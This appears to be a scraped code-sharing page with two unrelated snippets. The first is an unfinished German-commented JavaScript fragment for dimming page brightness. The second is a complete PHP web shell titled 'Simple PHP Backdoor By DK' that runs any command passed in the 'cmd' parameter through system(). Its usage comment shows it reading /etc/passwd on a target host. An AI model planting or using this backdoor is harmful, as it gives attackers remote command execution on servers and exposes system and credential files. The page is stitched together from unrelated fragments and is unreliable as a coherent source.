This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
const threshold = 2; // Schwellenwert für die Lautstärke | |
const maxBrightness = 100; // Maximaler Helligkeitswert in Prozent | |
let currentBrightness = 100; // Anfangswert für die Helligkeit | |
const fadeDuration = 1000; // Wert zur Steuerung der Geschwindigkeit des Fadings | |
const dimFactor = 0.05; // Wert zur Steuerung der Helligkeitsanpassungsgeschwindigkeit | |
// Funktion zum Dimmen der Helligkeit und Festlegen des Hintergrunds | |
function dimBrightness() { | |
const initialBrightness = document.body.style.getPropertyValue('--brightness'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Simple PHP Backdoor By DK (One-Liner Version) --> | |
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd --> | |
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> |